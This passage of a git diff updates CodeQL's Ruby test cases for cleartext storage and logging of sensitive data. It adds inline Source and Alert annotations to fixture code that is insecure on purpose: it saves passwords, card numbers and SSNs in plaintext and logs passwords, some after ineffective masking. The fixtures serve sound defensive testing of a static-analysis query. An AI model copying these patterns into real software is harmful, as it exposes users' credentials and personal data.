+| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | +| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | +| app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | +| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | +| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | +| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | +| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | +| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | +| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | +| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | +| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | +| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | +| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | edges | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | provenance | | | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | provenance | | @@ -120,32 +149,3 @@ nodes | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | semmle.label | "f982bf2531c149a8a1444a951b12e830" : String | | app/models/user.rb:17:21:17:32 | new_password | semmle.label | new_password | subpaths -#select -| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | -| app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | -| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | -| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | -| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | -| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | -| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | -| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | -| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref index 051d588b7010..903a20fe574c 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref @@ -1 +1,2 @@ -queries/security/cwe-312/CleartextStorage.ql \ No newline at end of file +query: queries/security/cwe-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb index 806b51096659..ae277596cfef 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb @@ -1,47 +1,47 @@ class UsersController < ApplicationController def createLikeCall - new_password = "043697b96909e03ca907599d6420555f" + new_password = "043697b96909e03ca907599d6420555f" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.create(name: "U1", password: new_password) + User.create(name: "U1", password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.create({ name: "U1", password: new_password }) + User.create({ name: "U1", password: new_password }) # $ Alert[rb/clear-text-storage-sensitive-data] end def updateLikeClassMethodCall - new_password = "083c9e1da4cc0c2f5480bb4dbe6ff141" + new_password = "083c9e1da4cc0c2f5480bb4dbe6ff141" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.update(1, name: "U1", password: new_password) + User.update(1, name: "U1", password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.update([1, 2], [{name: "U1", password: new_password}, {name: "U2", password: new_password}]) + User.update([1, 2], [{name: "U1", password: new_password}, {name: "U2", password: new_password}]) # $ Alert[rb/clear-text-storage-sensitive-data] end def insertAllLikeCall - new_password = "504d224a806cf8073cd14ef08242d422" + new_password = "504d224a806cf8073cd14ef08242d422" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - User.insert_all([{name: "U1", password: new_password}, {name: "U2", password: new_password}]) + User.insert_all([{name: "U1", password: new_password}, {name: "U2", password: new_password}]) # $ Alert[rb/clear-text-storage-sensitive-data] end def updateLikeInstanceMethodCall user = User.find(1) - new_password = "7d6ae08394c3f284506dca70f05995f6" + new_password = "7d6ae08394c3f284506dca70f05995f6" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - user.update(password: new_password) + user.update(password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - user.update({password: new_password}) + user.update({password: new_password}) # $ Alert[rb/clear-text-storage-sensitive-data] end def updateAttributeCall user = User.find(1) - new_password = "ff295f8648a406c37fbe378377320e4c" + new_password = "ff295f8648a406c37fbe378377320e4c" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to database - user.update_attribute("password", new_password) + user.update_attribute("password", new_password) # $ Alert[rb/clear-text-storage-sensitive-data] end def assignAttributeCall user = User.find(1) - new_password = "78ffbec583b546bd073efd898f833184" + new_password = "78ffbec583b546bd073efd898f833184" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password assigned to database field - user.password = new_password + user.password = new_password # $ Alert[rb/clear-text-storage-sensitive-data] user.save end @@ -55,13 +55,13 @@ def hashedPasswordAssign end def fileWrites - new_password = "0157af7c38cbdd24f1616de4e5321861" + new_password = "0157af7c38cbdd24f1616de4e5321861" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to disk - IO.write("foo.txt", "password: #{new_password}\n") + IO.write("foo.txt", "password: #{new_password}\n") # $ Alert[rb/clear-text-storage-sensitive-data] # BAD: plaintext password stored to disk - File.new("bar.txt", "a").puts("password: #{new_password}") + File.new("bar.txt", "a").puts("password: #{new_password}") # $ Alert[rb/clear-text-storage-sensitive-data] end def randomPasswordAssign @@ -76,15 +76,15 @@ def test info = [ { name: "U1", - password: "aaaaaaaaaa", - credit_card_number: "0000-0000-0000-0000", - SSN: "000-00-00000" + password: "aaaaaaaaaa", # $ Source[rb/clear-text-storage-sensitive-data] + credit_card_number: "0000-0000-0000-0000", # $ Source[rb/clear-text-storage-sensitive-data] + SSN: "000-00-00000" # $ Source[rb/clear-text-storage-sensitive-data] }, - {name: "U2", password: "bbbbbbb"} + {name: "U2", password: "bbbbbbb"} # $ Source[rb/clear-text-storage-sensitive-data] ] info.each do |inf| # BAD: Plaintext password, SSN, and CCN stored to database. - User.create!(inf) + User.create!(inf) # $ Alert[rb/clear-text-storage-sensitive-data] end end end diff --git a/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb b/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb index 09d1866424a3..7b5943e641c3 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb +++ b/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb @@ -1,20 +1,20 @@ class User < ActiveRecord::Base def set_password_1 - new_password = "06c38c6a8a9c11a9d3b209a3193047b4" + new_password = "06c38c6a8a9c11a9d3b209a3193047b4" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: directly storing a potential cleartext password to a field - self.update(password: new_password) + self.update(password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] end def set_password_2 - new_password = "52652fb5c709fb6b9b5a0194af7c6067" + new_password = "52652fb5c709fb6b9b5a0194af7c6067" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: directly storing a potential cleartext password to a field - update(password: new_password) + update(password: new_password) # $ Alert[rb/clear-text-storage-sensitive-data] end def set_password_3 - new_password = "f982bf2531c149a8a1444a951b12e830" + new_password = "f982bf2531c149a8a1444a951b12e830" # $ Source[rb/clear-text-storage-sensitive-data] # BAD: directly assigning a potential cleartext password to a field - self.password = new_password + self.password = new_password # $ Alert[rb/clear-text-storage-sensitive-data] self.save end end diff --git a/ruby/ql/test/query-tests/security/cwe-312/logging.rb b/ruby/ql/test/query-tests/security/cwe-312/logging.rb index 26b148f33c26..03b21b3625c2 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/logging.rb +++ b/ruby/ql/test/query-tests/security/cwe-312/logging.rb @@ -1,45 +1,45 @@ stdout_logger = Logger.new STDOUT -password = "043697b96909e03ca907599d6420555f" +password = "043697b96909e03ca907599d6420555f" # $ Source[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.info password +stdout_logger.info password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.debug password +stdout_logger.debug password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.error password +stdout_logger.error password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.fatal password +stdout_logger.fatal password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.unknown password +stdout_logger.unknown password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.warn password +stdout_logger.warn password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.add Logger::WARN, password +stdout_logger.add Logger::WARN, password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.add Logger::WARN, "message", password +stdout_logger.add Logger::WARN, "message", password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.log Logger::WARN, password +stdout_logger.log Logger::WARN, password # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger << "pw: #{password}" +stdout_logger << "pw: #{password}" # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: sensitive data in the progname will taint subsequent logging calls -stdout_logger.progname = password +stdout_logger.progname = password # $ Alert[rb/clear-text-logging-sensitive-data] -hsh1 = { password: "aec5058e61f7f122998b1a30ee2c66b6" } +hsh1 = { password: "aec5058e61f7f122998b1a30ee2c66b6" } # $ Source[rb/clear-text-logging-sensitive-data] hsh2 = {} # GOOD: no backwards flow stdout_logger.info hsh2[:password] -hsh2[:password] = "beeda625d7306b45784d91ea0336e201" +hsh2[:password] = "beeda625d7306b45784d91ea0336e201" # $ Source[rb/clear-text-logging-sensitive-data] hsh3 = hsh2 # BAD: password logged as plaintext -stdout_logger.info hsh1[:password] +stdout_logger.info hsh1[:password] # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.info hsh2[:password] +stdout_logger.info hsh2[:password] # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password logged as plaintext -stdout_logger.info hsh3[:password] +stdout_logger.info hsh3[:password] # $ Alert[rb/clear-text-logging-sensitive-data] # GOOD: not a password stdout_logger.info hsh1[:foo] @@ -61,30 +61,30 @@ # GOOD: password is effectively masked before logging stdout_logger.info password_masked_gsub_ex -password_masked_ineffective_sub = "ca497451f5e883662fb1a37bc9ec7838" -password_masked_ineffective_sub_ex = "ca497451f5e883662fb1a37bc9ec7838" -password_masked_ineffective_gsub = "a7e3747b19930d4f4b8181047194832f" -password_masked_ineffective_gsub_ex = "a7e3747b19930d4f4b8181047194832f" -password_masked_ineffective_sub = password_masked_ineffective_sub.sub(/./, "[password]") +password_masked_ineffective_sub = "ca497451f5e883662fb1a37bc9ec7838" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_sub_ex = "ca497451f5e883662fb1a37bc9ec7838" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_gsub = "a7e3747b19930d4f4b8181047194832f" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_gsub_ex = "a7e3747b19930d4f4b8181047194832f" # $ Source[rb/clear-text-logging-sensitive-data] +password_masked_ineffective_sub = password_masked_ineffective_sub.sub(/./, "[password]") # $ Source[rb/clear-text-logging-sensitive-data] password_masked_ineffective_sub_ex.sub!(/./, "[password]") -password_masked_ineffective_gsub = password_masked_ineffective_gsub.gsub(/[A-Z]/, "*") +password_masked_ineffective_gsub = password_masked_ineffective_gsub.gsub(/[A-Z]/, "*") # $ Source[rb/clear-text-logging-sensitive-data] password_masked_ineffective_gsub_ex.gsub!(/[A-Z]/, "*") # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_sub +stdout_logger.info password_masked_ineffective_sub # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_gsub +stdout_logger.info password_masked_ineffective_gsub # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_sub_ex +stdout_logger.info password_masked_ineffective_sub_ex # $ Alert[rb/clear-text-logging-sensitive-data] # BAD: password masked ineffectively -stdout_logger.info password_masked_ineffective_gsub_ex +stdout_logger.info password_masked_ineffective_gsub_ex # $ Alert[rb/clear-text-logging-sensitive-data] def foo(password, logger) # BAD: password logged as plaintext - logger.info password + logger.info password # $ Alert[rb/clear-text-logging-sensitive-data] end -password_arg = "65f2950df2f0e2c38d7ba2ccca767291" +password_arg = "65f2950df2f0e2c38d7ba2ccca767291" # $ Source[rb/clear-text-logging-sensitive-data] foo(password_arg, stdout_logger) foo("65f2950df2f0e2c38d7ba2ccca767292", stdout_logger) diff --git a/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref b/ruby/ql/test/query-tests/security/cwe-327/BrokenCryptoAlgorithm.qlref index e1c31fb2d584..92b721c8549e 100644 --- 